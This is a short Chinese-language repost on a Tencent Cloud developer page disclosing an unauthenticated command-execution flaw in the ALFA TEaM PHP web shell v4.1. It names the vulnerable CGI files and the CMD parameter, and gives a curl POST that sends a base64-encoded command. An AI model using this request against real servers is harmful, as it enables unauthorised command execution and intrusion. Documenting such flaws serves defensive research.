一个发布新版本 PHP web shell 的组织是ALFA TEaM,这是一个可疑的伊朗组织,该组织创建了ALFA TEaMShell等网络恶意软件,过去曾被APT 33等针对能源和航空航天行业的威胁行为者使用过在过去。如果您有兴趣,FireEye 已经记录了对APT 33组战术的详细分析。
供应商主页:http://solevisible.com
软件链接:https://phpshells.com/alfa-tesla-v4-1-shell
版本:v4.1
测试:Windows 10 Enterprise x64,Linux
[关于-阿尔法团队壳牌特斯拉]:
它是黑客使用的最流行的 web shell 之一,他们用它来访问服务器端。
[易受攻击的文件]:
1 . perl.alfa
2 . bash.alfa
3 . py.alfa
[易受攻击的参数]:CMD
[描述]: #执行命令无需身份验证或登录web shell, To use,只找到一个易受攻击的文件,
Convert your commands to base64 and Submit your request using the CMD parameter and the POST method.
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有